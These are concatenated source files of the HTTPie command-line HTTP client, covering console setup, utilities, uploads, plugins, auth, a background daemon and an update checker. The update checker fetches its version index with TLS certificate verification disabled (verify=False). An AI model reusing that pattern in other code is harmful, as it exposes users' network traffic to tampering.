self.stdout_encoding = getattr( actual_stdout, 'encoding', None) or UTF8 self.quiet = kwargs.pop('quiet', 0) def __str__(self): defaults = dict(type(self).__dict__) actual = dict(defaults) actual.update(self.__dict__) actual['config'] = self.config return repr_dict({ key: value for key, value in actual.items() if not key.startswith('_') }) def __repr__(self): return f'<{type(self).__name__} {self}>' _config: Config = None @property def config(self) -> Config: config = self._config if not config: self._config = config = Config(directory=self.config_dir) if not config.is_new(): try: config.load() except ConfigFileError as e: self.log_error(e, level=LogLevel.WARNING) return config @property def devnull(self) -> IO: if self._devnull is None: self._devnull = open(os.devnull, 'w+') return self._devnull @contextmanager def as_silent(self) -> Iterator[None]: original_stdout = self.stdout original_stderr = self.stderr try: self.stdout = self.devnull self.stderr = self.devnull yield finally: self.stdout = original_stdout self.stderr = original_stderr def log_error(self, msg: str, level: LogLevel = LogLevel.ERROR) -> None: if self.stdout_isatty and self.quiet >= LOG_LEVEL_DISPLAY_THRESHOLDS[level]: stderr = self.stderr # Not directly /dev/null, since stderr might be mocked else: stderr = self._orig_stderr rich_console = self._make_rich_console(file=stderr, force_terminal=stderr.isatty()) rich_console.print( f'\n{self.program_name}: {level.value}: {msg}\n\n', style=LOG_LEVEL_COLORS[level], markup=False, highlight=False, soft_wrap=True ) def apply_warnings_filter(self) -> None: if self.quiet >= LOG_LEVEL_DISPLAY_THRESHOLDS[LogLevel.WARNING]: warnings.simplefilter("ignore") def _make_rich_console( self, file: IO[str], force_terminal: bool ) -> 'Console': from rich.console import Console from httpie.output.ui.rich_palette import _make_rich_color_theme style = getattr(self.args, 'style', None) theme = _make_rich_color_theme(style) # Rich infers the rest of the knowledge (e.g encoding) # dynamically by looking at the file/stderr. return Console( file=file, force_terminal=force_terminal, no_color=(self.colors == 0), theme=theme ) # Rich recommends separating the actual console (stdout) from # the error (stderr) console for better isolation between parts. # https://rich.readthedocs.io/en/stable/console.html#error-console @cached_property def rich_console(self): return self._make_rich_console(self.stdout, self.stdout_isatty) @cached_property def rich_error_console(self): return self._make_rich_console(self.stderr, self.stderr_isatty) File: httpie/utils.py import os import base64 import json import mimetypes import re import sys import time import tempfile import sysconfig from collections import OrderedDict from contextlib import contextmanager from http.cookiejar import parse_ns_headers from pathlib import Path from pprint import pformat from urllib.parse import urlsplit from typing import Any, List, Optional, Tuple, Generator, Callable, Iterable, IO, TypeVar import requests.auth RE_COOKIE_SPLIT = re.compile(r', (?=[^ ;]+=)') Item = Tuple[str, Any] Items = List[Item] T = TypeVar("T") class JsonDictPreservingDuplicateKeys(OrderedDict): """A specialized JSON dict preserving duplicate keys.""" # Python versions prior to 3.8 suffer from an issue with multiple keys with the same name. # `json.dumps(obj, indent=N, sort_keys=True)` will output sorted keys when they are unique, and # duplicate keys will be outputted as they were defined in the original data. # See <https://bugs.python.org/issue23493#msg400929> for the behavior change between Python versions. SUPPORTS_SORTING = sys.version_info >= (3, 8) def __init__(self, items: Items): self._items = items self._ensure_items_used() def _ensure_items_used(self) -> None: """HACK: Force `json.dumps()` to use `self.items()` instead of an empty dict. Two JSON encoders are available on CPython: pure-Python (1) and C (2) implementations. (1) The pure-python implementation will do a simple `if not dict: return '{}'`, and we could fake that check by implementing the `__bool__()` method. Source: - <https://github.com/python/cpython/blob/9d318ad/Lib/json/encoder.py#L334-L336> (2) On the other hand, the C implementation will do a check on the number of items contained inside the dict, using a verification on `dict->ma_used`, which is updated only when an item is added/removed from the dict. For that case, there is no workaround but to add an item into the dict. Sources: - <https://github.com/python/cpython/blob/9d318ad/Modules/_json.c#L1581-L1582> - <https://github.com/python/cpython/blob/9d318ad/Include/cpython/dictobject.h#L53> - <https://github.com/python/cpython/blob/9d318ad/Include/cpython/dictobject.h#L17-L18> To please both implementations, we simply add one item to the dict. """ if self._items: self['__hack__'] = '__hack__' def items(self) -> Items: """Return all items, duplicate ones included. """ return self._items def load_json_preserve_order_and_dupe_keys(s): return json.loads(s, object_pairs_hook=JsonDictPreservingDuplicateKeys) def repr_dict(d: dict) -> str: return pformat(d) def humanize_bytes(n, precision=2): # Author: Doug Latornell # Licence: MIT # URL: https://code.activestate.com/recipes/577081/ """Return a humanized string representation of a number of bytes. >>> humanize_bytes(1) '1 B' >>> humanize_bytes(1024, precision=1) '1.0 kB' >>> humanize_bytes(1024 * 123, precision=1) '123.0 kB' >>> humanize_bytes(1024 * 12342, precision=1) '12.1 MB' >>> humanize_bytes(1024 * 12342, precision=2) '12.05 MB' >>> humanize_bytes(1024 * 1234, precision=2) '1.21 MB' >>> humanize_bytes(1024 * 1234 * 1111, precision=2) '1.31 GB' >>> humanize_bytes(1024 * 1234 * 1111, precision=1) '1.3 GB' """ abbrevs = [ (1 << 50, 'PB'), (1 << 40, 'TB'), (1 << 30, 'GB'), (1 << 20, 'MB'), (1 << 10, 'kB'), (1, 'B') ] if n == 1: return '1 B' for factor, suffix in abbrevs: if n >= factor: break # noinspection PyUnboundLocalVariable return f'{n / factor:.{precision}f} {suffix}' class ExplicitNullAuth(requests.auth.AuthBase): """Forces requests to ignore the ``.netrc``. <https://github.com/psf/requests/issues/2773#issuecomment-174312831> """ def __call__(self, r): return r def get_content_type(filename): """ Return the content type for ``filename`` in format appropriate for Content-Type headers, or ``None`` if the file type is unknown to ``mimetypes``. """ return mimetypes.guess_type(filename, strict=False)[0] def split_cookies(cookies): """ When ``requests`` stores cookies in ``response.headers['Set-Cookie']`` it concatenates all of them through ``, ``. This function splits cookies apart being careful to not to split on ``, `` which may be part of cookie value. """ if not cookies: return [] return RE_COOKIE_SPLIT.split(cookies) def get_expired_cookies( cookies: str, now: float = None ) -> List[dict]: now = now or time.time() def is_expired(expires: Optional[float]) -> bool: return expires is not None and expires <= now attr_sets: List[Tuple[str, str]] = parse_ns_headers( split_cookies(cookies) ) cookies = [ # The first attr name is the cookie name. dict(attrs[1:], name=attrs[0][0]) for attrs in attr_sets ] _max_age_to_expires(cookies=cookies, now=now) return [ { 'name': cookie['name'], 'path': cookie.get('path', '/') } for cookie in cookies if is_expired(expires=cookie.get('expires')) ] def _max_age_to_expires(cookies, now): """ Translate `max-age` into `expires` for Requests to take it into account. HACK/FIXME: <https://github.com/psf/requests/issues/5743> """ for cookie in cookies: if 'expires' in cookie: continue max_age = cookie.get('max-age') if max_age and max_age.isdigit(): cookie['expires'] = now + float(max_age) def parse_content_type_header(header): """Borrowed from requests.""" tokens = header.split(';') content_type, params = tokens[0].strip(), tokens[1:] params_dict = {} items_to_strip = "\"' " for param in params: param = param.strip() if param: key, value = param, True index_of_equals = param.find("=") if index_of_equals != -1: key = param[:index_of_equals].strip(items_to_strip) value = param[index_of_equals + 1:].strip(items_to_strip) params_dict[key.lower()] = value return content_type, params_dict def as_site(path: Path, **extra_vars) -> Path: site_packages_path = sysconfig.get_path( 'purelib', vars={'base': str(path), **extra_vars} ) return Path(site_packages_path) def get_site_paths(path: Path) -> Iterable[Path]: from httpie.compat import ( MIN_SUPPORTED_PY_VERSION, MAX_SUPPORTED_PY_VERSION, is_frozen ) if is_frozen: [major, min_minor] = MIN_SUPPORTED_PY_VERSION [major, max_minor] = MAX_SUPPORTED_PY_VERSION for minor in range(min_minor, max_minor + 1): yield as_site( path, py_version_short=f'{major}.{minor}' ) else: yield as_site(path) def split_iterable(iterable: Iterable[T], key: Callable[[T], bool]) -> Tuple[List[T], List[T]]: left, right = [], [] for item in iterable: if key(item): left.append(item) else: right.append(item) return left, right def unwrap_context(exc: Exception) -> Optional[Exception]: context = exc.__context__ if isinstance(context, Exception): return unwrap_context(context) else: return exc def url_as_host(url: str) -> str: return urlsplit(url).netloc.split('@')[-1] class LockFileError(ValueError): pass @contextmanager def open_with_lockfile(file: Path, *args, **kwargs) -> Generator[IO[Any], None, None]: file_id = base64.b64encode(os.fsencode(file)).decode() target_file = Path(tempfile.gettempdir()) / file_id # Have an atomic-like touch here, so we'll tighten the possibility of # a race occurring between multiple processes accessing the same file. try: target_file.touch(exist_ok=False) except FileExistsError as exc: raise LockFileError("Can't modify a locked file.") from exc try: with open(file, *args, **kwargs) as stream: yield stream finally: target_file.unlink() def is_version_greater(version_1: str, version_2: str) -> bool: # In an ideal scenario, we would depend on `packaging` in order # to offer PEP 440 compatible parsing. But since it might not be # commonly available for outside packages, and since we are only # going to parse HTTPie's own version it should be fine to compare # this in a SemVer subset fashion. def split_version(version: str) -> Tuple[int, ...]: parts = [] for part in version.split('.')[:3]: try: parts.append(int(part)) except ValueError: break return tuple(parts) return split_version(version_1) > split_version(version_2) File: httpie/uploads.py import sys import os import zlib import functools import threading from typing import Any, Callable, IO, Iterable, Optional, Tuple, Union, TYPE_CHECKING from urllib.parse import urlencode import requests from requests.utils import super_len if TYPE_CHECKING: from requests_toolbelt import MultipartEncoder from .context import Environment from .cli.dicts import MultipartRequestDataDict, RequestDataDict from .compat import is_windows class ChunkedStream: def __iter__(self) -> Iterable[Union[str, bytes]]: raise NotImplementedError class ChunkedUploadStream(ChunkedStream): def __init__( self, stream: Iterable, callback: Callable, event: Optional[threading.Event] = None ) -> None: self.callback = callback self.stream = stream self.event = event def __iter__(self) -> Iterable[Union[str, bytes]]: for chunk in self.stream: if self.event: self.event.set() self.callback(chunk) yield chunk class ChunkedMultipartUploadStream(ChunkedStream): chunk_size = 100 * 1024 def __init__( self, encoder: 'MultipartEncoder', event: Optional[threading.Event] = None ) -> None: self.encoder = encoder self.event = event def __iter__(self) -> Iterable[Union[str, bytes]]: while True: chunk = self.encoder.read(self.chunk_size) if self.event: self.event.set() if not chunk: break yield chunk def as_bytes(data: Union[str, bytes]) -> bytes: if isinstance(data, str): return data.encode() else: return data CallbackT = Callable[[bytes], bytes] def _wrap_function_with_callback( func: Callable[..., Any], callback: CallbackT ) -> Callable[..., Any]: @functools.wraps(func) def wrapped(*args, **kwargs): chunk = func(*args, **kwargs) callback(chunk) return chunk return wrapped def is_stdin(file: IO) -> bool: try: file_no = file.fileno() except Exception: return False else: return file_no == sys.stdin.fileno() READ_THRESHOLD = float(os.getenv('HTTPIE_STDIN_READ_WARN_THRESHOLD', 10.0)) def observe_stdin_for_data_thread(env: Environment, file: IO, read_event: threading.Event) -> None: # Windows unfortunately does not support select() operation # on regular files, like stdin in our use case. # https://docs.python.org/3/library/select.html#select.select if is_windows: return None # If the user configures READ_THRESHOLD to be 0, then # disable this warning. if READ_THRESHOLD == 0: return None def worker(event: threading.Event) -> None: if not event.wait(timeout=READ_THRESHOLD): env.stderr.write( f'> warning: no stdin data read in {READ_THRESHOLD}s ' f'(perhaps you want to --ignore-stdin)\n' f'> See: https://httpie.io/docs/cli/best-practices\n' ) # Making it a daemon ensures that if the user exits from the main program # (e.g. either regularly or with Ctrl-C), the thread will not # block them. thread = threading.Thread( target=worker, args=(read_event,), daemon=True ) thread.start() def _read_file_with_selectors(file: IO, read_event: threading.Event) -> bytes: if is_windows or not is_stdin(file): return as_bytes(file.read()) import select # Try checking whether there is any incoming data for READ_THRESHOLD # seconds. If there isn't anything in the given period, issue # a warning about a misusage. read_selectors, _, _ = select.select([file], [], [], READ_THRESHOLD) if read_selectors: read_event.set() return as_bytes(file.read()) def _prepare_file_for_upload( env: Environment, file: Union[IO, 'MultipartEncoder'], callback: CallbackT, chunked: bool = False, content_length_header_value: Optional[int] = None, ) -> Union[bytes, IO, ChunkedStream]: read_event = threading.Event() if not super_len(file): if is_stdin(file): observe_stdin_for_data_thread(env, file, read_event) # Zero-length -> assume stdin. if content_length_header_value is None and not chunked: # Read the whole stdin to determine `Content-Length`. # # TODO: Instead of opt-in --chunked, consider making # `Transfer-Encoding: chunked` for STDIN opt-out via # something like --no-chunked. # This would be backwards-incompatible so wait until v3.0.0. # file = _read_file_with_selectors(file, read_event) else: file.read = _wrap_function_with_callback( file.read, callback ) if chunked: from requests_toolbelt import MultipartEncoder if isinstance(file, MultipartEncoder): return ChunkedMultipartUploadStream( encoder=file, event=read_event, ) else: return ChunkedUploadStream( stream=file, callback=callback, event=read_event ) else: return file def prepare_request_body( env: Environment, raw_body: Union[str, bytes, IO, 'MultipartEncoder', RequestDataDict], body_read_callback: CallbackT, offline: bool = False, chunked: bool = False, content_length_header_value: Optional[int] = None, ) -> Union[bytes, IO, 'MultipartEncoder', ChunkedStream]: is_file_like = hasattr(raw_body, 'read') if isinstance(raw_body, (bytes, str)): body = as_bytes(raw_body) elif isinstance(raw_body, RequestDataDict): body = as_bytes(urlencode(raw_body, doseq=True)) else: body = raw_body if offline: if is_file_like: return as_bytes(raw_body.read()) else: return body if is_file_like: return _prepare_file_for_upload( env, body, chunked=chunked, callback=body_read_callback, content_length_header_value=content_length_header_value ) elif chunked: return ChunkedUploadStream( stream=iter([body]), callback=body_read_callback ) else: return body def get_multipart_data_and_content_type( data: MultipartRequestDataDict, boundary: str = None, content_type: str = None, ) -> Tuple['MultipartEncoder', str]: from requests_toolbelt import MultipartEncoder encoder = MultipartEncoder( fields=data.items(), boundary=boundary, ) if content_type: content_type = content_type.strip() if 'boundary=' not in content_type: content_type = f'{content_type}; boundary={encoder.boundary_value}' else: content_type = encoder.content_type data = encoder return data, content_type def compress_request( request: requests.PreparedRequest, always: bool, ): deflater = zlib.compressobj() if isinstance(request.body, str): body_bytes = request.body.encode() elif hasattr(request.body, 'read'): body_bytes = request.body.read() else: body_bytes = request.body deflated_data = deflater.compress(body_bytes) deflated_data += deflater.flush() is_economical = len(deflated_data) < len(body_bytes) if is_economical or always: request.body = deflated_data request.headers['Content-Encoding'] = 'deflate' request.headers['Content-Length'] = str(len(deflated_data)) File: httpie/__main__.py """The main entry point. Invoke as `http' or `python -m httpie'. """ def main(): try: from httpie.core import main exit_status = main() except KeyboardInterrupt: from httpie.status import ExitStatus exit_status = ExitStatus.ERROR_CTRL_C return exit_status.value if __name__ == '__main__': # pragma: nocover import sys sys.exit(main()) File: httpie/status.py from enum import IntEnum, unique @unique class ExitStatus(IntEnum): """Program exit status code constants.""" SUCCESS = 0 ERROR = 1 ERROR_TIMEOUT = 2 # See --check-status ERROR_HTTP_3XX = 3 ERROR_HTTP_4XX = 4 ERROR_HTTP_5XX = 5 ERROR_TOO_MANY_REDIRECTS = 6 PLUGIN_ERROR = 7 # 128+2 SIGINT # <http://www.tldp.org/LDP/abs/html/exitcodes.html> ERROR_CTRL_C = 130 def http_status_to_exit_status(http_status: int, follow=False) -> ExitStatus: """ Translate HTTP status code to exit status code. (Relevant only when invoked with --check-status or --download.) """ if 300 <= http_status <= 399 and not follow: # Redirect return ExitStatus.ERROR_HTTP_3XX elif 400 <= http_status <= 499: # Client Error return ExitStatus.ERROR_HTTP_4XX elif 500 <= http_status <= 599: # Server Error return ExitStatus.ERROR_HTTP_5XX else: return ExitStatus.SUCCESS File: httpie/adapters.py from httpie.cli.dicts import HTTPHeadersDict from requests.adapters import HTTPAdapter class HTTPieHTTPAdapter(HTTPAdapter): def build_response(self, req, resp): """Wrap the original headers with the `HTTPHeadersDict` to preserve multiple headers that have the same name""" response = super().build_response(req, resp) response.headers = HTTPHeadersDict(getattr(resp, 'headers', {})) return response File: httpie/plugins/registry.py from .manager import PluginManager from .builtin import BasicAuthPlugin, DigestAuthPlugin, BearerAuthPlugin from ..output.formatters.headers import HeadersFormatter from ..output.formatters.json import JSONFormatter from ..output.formatters.xml import XMLFormatter from ..output.formatters.colors import ColorFormatter plugin_manager = PluginManager() # Register all built-in plugins. plugin_manager.register( BasicAuthPlugin, DigestAuthPlugin, BearerAuthPlugin, HeadersFormatter, JSONFormatter, XMLFormatter, ColorFormatter, ) File: httpie/plugins/__init__.py """ WARNING: The plugin API is still work in progress and will probably be completely reworked in the future. """ from .base import ( AuthPlugin, FormatterPlugin, ConverterPlugin, TransportPlugin ) __all__ = ('AuthPlugin', 'ConverterPlugin', 'FormatterPlugin', 'TransportPlugin') File: httpie/plugins/builtin.py from base64 import b64encode import requests.auth from .base import AuthPlugin # noinspection PyAbstractClass class BuiltinAuthPlugin(AuthPlugin): package_name = '(builtin)' class HTTPBasicAuth(requests.auth.HTTPBasicAuth): def __call__( self, request: requests.PreparedRequest ) -> requests.PreparedRequest: """ Override username/password serialization to allow unicode. See https://github.com/httpie/cli/issues/212 """ # noinspection PyTypeChecker request.headers['Authorization'] = type(self).make_header( self.username, self.password).encode('latin1') return request @staticmethod def make_header(username: str, password: str) -> str: credentials = f'{username}:{password}' token = b64encode(credentials.encode()).strip().decode('latin1') return f'Basic {token}' class HTTPBearerAuth(requests.auth.AuthBase): def __init__(self, token: str) -> None: self.token = token def __call__(self, request: requests.PreparedRequest) -> requests.PreparedRequest: request.headers['Authorization'] = f'Bearer {self.token}' return request class BasicAuthPlugin(BuiltinAuthPlugin): name = 'Basic HTTP auth' auth_type = 'basic' netrc_parse = True # noinspection PyMethodOverriding def get_auth(self, username: str, password: str) -> HTTPBasicAuth: return HTTPBasicAuth(username, password) class DigestAuthPlugin(BuiltinAuthPlugin): name = 'Digest HTTP auth' auth_type = 'digest' netrc_parse = True # noinspection PyMethodOverriding def get_auth( self, username: str, password: str ) -> requests.auth.HTTPDigestAuth: return requests.auth.HTTPDigestAuth(username, password) class BearerAuthPlugin(BuiltinAuthPlugin): name = 'Bearer HTTP Auth' auth_type = 'bearer' netrc_parse = False auth_parse = False # noinspection PyMethodOverriding def get_auth(self, **kwargs) -> requests.auth.HTTPDigestAuth: return HTTPBearerAuth(self.raw_auth) File: httpie/plugins/manager.py import sys import os import warnings from itertools import groupby from operator import attrgetter from typing import Dict, List, Type, Iterator, Iterable, Optional, ContextManager from pathlib import Path from contextlib import contextmanager, nullcontext from ..compat import importlib_metadata, find_entry_points, get_dist_name from ..utils import repr_dict, get_site_paths from . import AuthPlugin, ConverterPlugin, FormatterPlugin, TransportPlugin from .base import BasePlugin ENTRY_POINT_CLASSES = { 'httpie.plugins.auth.v1': AuthPlugin, 'httpie.plugins.converter.v1': ConverterPlugin, 'httpie.plugins.formatter.v1': FormatterPlugin, 'httpie.plugins.transport.v1': TransportPlugin } ENTRY_POINT_NAMES = list(ENTRY_POINT_CLASSES.keys()) @contextmanager def _load_directories(site_dirs: Iterable[Path]) -> Iterator[None]: plugin_dirs = [ os.fspath(site_dir) for site_dir in site_dirs ] sys.path.extend(plugin_dirs) try: yield finally: for plugin_dir in plugin_dirs: sys.path.remove(plugin_dir) def enable_plugins(plugins_dir: Optional[Path]) -> ContextManager[None]: if plugins_dir is None: return nullcontext() else: return _load_directories(get_site_paths(plugins_dir)) class PluginManager(list): def register(self, *plugins: Type[BasePlugin]): for plugin in plugins: self.append(plugin) def unregister(self, plugin: Type[BasePlugin]): self.remove(plugin) def filter(self, by_type=Type[BasePlugin]): return [plugin for plugin in self if issubclass(plugin, by_type)] def iter_entry_points(self, directory: Optional[Path] = None): with enable_plugins(directory): eps = importlib_metadata.entry_points() for entry_point_name in ENTRY_POINT_NAMES: yield from find_entry_points(eps, group=entry_point_name) def load_installed_plugins(self, directory: Optional[Path] = None): for entry_point in self.iter_entry_points(directory): plugin_name = get_dist_name(entry_point) try: plugin = entry_point.load() except BaseException as exc: warnings.warn( f'While loading "{plugin_name}", an error occurred: {exc}\n' f'For uninstallations, please use either "httpie plugins uninstall {plugin_name}" ' f'or "pip uninstall {plugin_name}" (depending on how you installed it in the first ' 'place).' ) continue plugin.package_name = plugin_name self.register(plugin) # Auth def get_auth_plugins(self) -> List[Type[AuthPlugin]]: return self.filter(AuthPlugin) def get_auth_plugin_mapping(self) -> Dict[str, Type[AuthPlugin]]: return { plugin.auth_type: plugin for plugin in self.get_auth_plugins() } def get_auth_plugin(self, auth_type: str) -> Type[AuthPlugin]: return self.get_auth_plugin_mapping()[auth_type] # Output processing def get_formatters(self) -> List[Type[FormatterPlugin]]: return self.filter(FormatterPlugin) def get_formatters_grouped(self) -> Dict[str, List[Type[FormatterPlugin]]]: return { group_name: list(group) for group_name, group in groupby(self.get_formatters(), key=attrgetter('group_name')) } def get_converters(self) -> List[Type[ConverterPlugin]]: return self.filter(ConverterPlugin) # Adapters def get_transport_plugins(self) -> List[Type[TransportPlugin]]: return self.filter(TransportPlugin) def __str__(self): return repr_dict({ 'adapters': self.get_transport_plugins(), 'auth': self.get_auth_plugins(), 'converters': self.get_converters(), 'formatters': self.get_formatters(), }) def __repr__(self): return f'<{type(self).__name__} {self}>' File: httpie/plugins/base.py from typing import Tuple class BasePlugin: # The name of the plugin, eg. "My auth". name = None # Optional short description. It will be shown in the help # under --auth-type. description = None # This be set automatically once the plugin has been loaded. package_name = None class AuthPlugin(BasePlugin): """ Base auth plugin class. See httpie-ntlm for an example auth plugin: <https://github.com/httpie/httpie-ntlm> See also `test_auth_plugins.py` """ # The value that should be passed to --auth-type # to use this auth plugin. Eg. "my-auth" auth_type = None # Set to `False` to make it possible to invoke this auth # plugin without requiring the user to specify credentials # through `--auth, -a`. auth_require = True # By default the `-a` argument is parsed for `username:password`. # Set this to `False` to disable the parsing and error handling. auth_parse = True # Set to `True` to make it possible for this auth # plugin to acquire credentials from the user’s netrc file(s). # It is used as a fallback when the credentials are not provided explicitly # through `--auth, -a`. Enabling this will allow skipping `--auth, -a` # even when `auth_require` is set `True` (provided that netrc provides # credential for a given host). netrc_parse = False # If both `auth_parse` and `prompt_password` are set to `True`, # and the value of `-a` lacks the password part, # then the user will be prompted to type the password in. prompt_password = True # Will be set to the raw value of `-a` (if provided) before # `get_auth()` gets called. If the credentials came from a netrc file, # then this is `None`. raw_auth = None def get_auth(self, username: str = None, password: str = None): """ If `auth_parse` is set to `True`, then `username` and `password` contain the parsed credentials. Use `self.raw_auth` to access the raw value passed through `--auth, -a`. Return a ``requests.auth.AuthBase`` subclass instance. """ raise NotImplementedError() class TransportPlugin(BasePlugin): """ Requests transport adapter docs: <https://requests.readthedocs.io/en/latest/user/advanced/#transport-adapters> See httpie-unixsocket for an example transport plugin: <https://github.com/httpie/httpie-unixsocket> """ # The URL prefix the adapter should be mount to. prefix = None def get_adapter(self): """ Return a ``requests.adapters.BaseAdapter`` subclass instance to be mounted to ``self.prefix``. """ raise NotImplementedError() class ConverterPlugin(BasePlugin): """ Possibly converts binary response data for prettified terminal display. See httpie-msgpack for an example converter plugin: <https://github.com/rasky/httpie-msgpack>. """ def __init__(self, mime: str): self.mime = mime def convert(self, body: bytes) -> Tuple[str, str]: """ Convert a binary body to a textual representation for the terminal and return a tuple containing the new Content-Type and content, e.g.: ('application/json', '{}') """ raise NotImplementedError @classmethod def supports(cls, mime: str) -> bool: raise NotImplementedError class FormatterPlugin(BasePlugin): """ Possibly formats response body & headers for prettified terminal display. """ group_name = 'format' def __init__(self, **kwargs): """ :param env: an class:`Environment` instance :param kwargs: additional keyword argument that some formatters might require. """ self.enabled = True self.kwargs = kwargs self.format_options = kwargs['format_options'] def format_headers(self, headers: str) -> str: """Return processed `headers` :param headers: The headers as text. """ return headers def format_body(self, content: str, mime: str) -> str: """Return processed `content`. :param mime: E.g., 'application/atom+xml'. :param content: The body content as text """ return content def format_metadata(self, metadata: str) -> str: """Return processed `metadata`. :param metadata: The metadata as text. """ return metadata File: httpie/internal/daemons.py """ This module provides an interface to spawn a detached task to be run with httpie.internal.daemon_runner on a separate process. It is based on DVC's daemon system. https://github.com/iterative/dvc/blob/main/dvc/daemon.py """ import inspect import os import platform import sys import httpie.__main__ from contextlib import suppress from subprocess import Popen, DEVNULL from typing import Dict, List from httpie.compat import is_frozen, is_windows ProcessContext = Dict[str, str] def _start_process(cmd: List[str], **kwargs) -> Popen: prefix = [sys.executable] # If it is frozen, sys.executable points to the binary (http). # Otherwise it points to the python interpreter. if not is_frozen: main_entrypoint = httpie.__main__.__file__ prefix += [main_entrypoint] return Popen(prefix + cmd, close_fds=True, shell=False, stdout=DEVNULL, stderr=DEVNULL, **kwargs) def _spawn_windows(cmd: List[str], process_context: ProcessContext) -> None: from subprocess import ( CREATE_NEW_PROCESS_GROUP, CREATE_NO_WINDOW, STARTF_USESHOWWINDOW, STARTUPINFO, ) # https://stackoverflow.com/a/7006424 # https://bugs.python.org/issue41619 creationflags = CREATE_NEW_PROCESS_GROUP | CREATE_NO_WINDOW startupinfo = STARTUPINFO() startupinfo.dwFlags |= STARTF_USESHOWWINDOW _start_process( cmd, env=process_context, creationflags=creationflags, startupinfo=startupinfo, ) def _spawn_posix(args: List[str], process_context: ProcessContext) -> None: """ Perform a double fork procedure* to detach from the parent process so that we don't block the user even if their original command's execution is done but the release fetcher is not. [1]: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap11.html#tag_11_01_03 """ from httpie.core import main try: pid = os.fork() if pid > 0: return except OSError: os._exit(1) os.setsid() try: pid = os.fork() if pid > 0: os._exit(0) except OSError: os._exit(1) # Close all standard inputs/outputs sys.stdin.close() sys.stdout.close() sys.stderr.close() if platform.system() == 'Darwin': # Double-fork is not reliable on MacOS, so we'll use a subprocess # to ensure the task is isolated properly. process = _start_process(args, env=process_context) # Unlike windows, since we already completed the fork procedure # we can simply join the process and wait for it. process.communicate() else: os.environ.update(process_context) with suppress(BaseException): main(['http'] + args) os._exit(0) def _spawn(args: List[str], process_context: ProcessContext) -> None: """ Spawn a new process to run the given command. """ if is_windows: _spawn_windows(args, process_context) else: _spawn_posix(args, process_context) def spawn_daemon(task: str) -> None: args = [task, '--daemon'] process_context = os.environ.copy() if not is_frozen: file_path = os.path.abspath(inspect.stack()[0][1]) process_context['PYTHONPATH'] = os.path.dirname( os.path.dirname(os.path.dirname(file_path)) ) _spawn(args, process_context) File: httpie/internal/daemon_runner.py import argparse from contextlib import redirect_stderr, redirect_stdout from typing import List from httpie.context import Environment from httpie.internal.update_warnings import _fetch_updates, _get_suppress_context from httpie.status import ExitStatus STATUS_FILE = '.httpie-test-daemon-status' def _check_status(env): # This function is used only for the testing (test_update_warnings). # Since we don't want to trigger the fetch_updates (which would interact # with real world resources), we'll only trigger this pseudo task # and check whether the STATUS_FILE is created or not. import tempfile from pathlib import Path status_file = Path(tempfile.gettempdir()) / STATUS_FILE status_file.touch() DAEMONIZED_TASKS = { 'check_status': _check_status, 'fetch_updates': _fetch_updates, } def _parse_options(args: List[str]) -> argparse.Namespace: parser = argparse.ArgumentParser() parser.add_argument('task_id') parser.add_argument('--daemon', action='store_true') return parser.parse_known_args(args)[0] def is_daemon_mode(args: List[str]) -> bool: return '--daemon' in args def run_daemon_task(env: Environment, args: List[str]) -> ExitStatus: options = _parse_options(args) assert options.daemon assert options.task_id in DAEMONIZED_TASKS with redirect_stdout(env.devnull), redirect_stderr(env.devnull): with _get_suppress_context(env): DAEMONIZED_TASKS[options.task_id](env) return ExitStatus.SUCCESS File: httpie/internal/__init__.py File: httpie/internal/update_warnings.py import json from contextlib import nullcontext, suppress from datetime import datetime, timedelta from pathlib import Path from typing import Any, Optional, Callable import requests import httpie from httpie.context import Environment, LogLevel from httpie.internal.__build_channel__ import BUILD_CHANNEL from httpie.internal.daemons import spawn_daemon from httpie.utils import is_version_greater, open_with_lockfile # Automatically updated package version index. PACKAGE_INDEX_LINK = 'https://packages.httpie.io/latest.json' FETCH_INTERVAL = timedelta(weeks=2) WARN_INTERVAL = timedelta(weeks=1) UPDATE_MESSAGE_FORMAT = """\ A new HTTPie release ({last_released_version}) is available. To see how you can update, please visit https://httpie.io/docs/cli/{installation_method} """ ALREADY_UP_TO_DATE_MESSAGE = """\ You are already up-to-date. """ def _read_data_error_free(file: Path) -> Any: # If the file is broken / non-existent, ignore it. try: with open(file) as stream: return json.load(stream) except (ValueError, OSError): return {} def _fetch_updates(env: Environment) -> str: file = env.config.version_info_file data = _read_data_error_free(file) response = requests.get(PACKAGE_INDEX_LINK, verify=False) response.raise_for_status() data.setdefault('last_warned_date', None) data['last_fetched_date'] = datetime.now().isoformat() data['last_released_versions'] = response.json() with open_with_lockfile(file, 'w') as stream: json.dump(data, stream) def fetch_updates(env: Environment, lazy: bool = True): if lazy: spawn_daemon('fetch_updates') else: _fetch_updates(env) def maybe_fetch_updates(env: Environment) -> None: if env.config.get('disable_update_warnings'): return None data = _read_data_error_free(env.config.version_info_file) if data: current_date = datetime.now() last_fetched_date = datetime.fromisoformat(data['last_fetched_date']) earliest_fetch_date = last_fetched_date + FETCH_INTERVAL if current_date < earliest_fetch_date: return None fetch_updates(env) def _get_suppress_context(env: Environment) -> Any: """Return a context manager that suppress all possible errors. Note: if you have set the developer_mode=True in your config, then it will show all errors for easier debugging.""" if env.config.developer_mode: return nullcontext() else: return suppress(BaseException) def _update_checker( func: Callable[[Environment], None] ) -> Callable[[Environment], None]: """Control the execution of the update checker (suppress errors, trigger auto updates etc.)""" def wrapper(env: Environment) -> None: with _get_suppress_context(env): func(env) with _get_suppress_context(env): maybe_fetch_updates(env) return wrapper def _get_update_status(env: Environment) -> Optional[str]: """If there is a new update available, return the warning text. Otherwise just return None.""" file = env.config.version_info_file if not file.exists(): return None with _get_suppress_context(env): # If the user quickly spawns multiple httpie processes # we don't want to end in a race. with open_with_lockfile(file) as stream: version_info = json.load(stream) available_channels = version_info['last_released_versions'] if BUILD_CHANNEL not in available_channels: return None current_version = httpie.__version__ last_released_version = available_channels[BUILD_CHANNEL] if not is_version_greater(last_released_version, current_version): return None text = UPDATE_MESSAGE_FORMAT.format( last_released_version=last_released_version, installation_method=BUILD_CHANNEL, ) return text def get_update_status(env: Environment) -> str: return _get_update_status(env) or ALREADY_UP_TO_DATE_MESSAGE @_update_checker def check_updates(env: Environment) -> None: if env.config.get('disable_update_warnings'): return None file = env.config.version_info_file update_status = _get_update_status(env) if not update_status: return None # If the user quickly spawns multiple httpie processes # we don't want to end in a race. with open_with_lockfile(file) as stream: version_info = json.load(stream) # We don't want to spam the user with too many warnings, # so we'll only warn every once a while (WARN_INTERNAL). current_date = datetime.now() last_warned_date = version_info['last_warned_date'] if last_warned_date is not None: 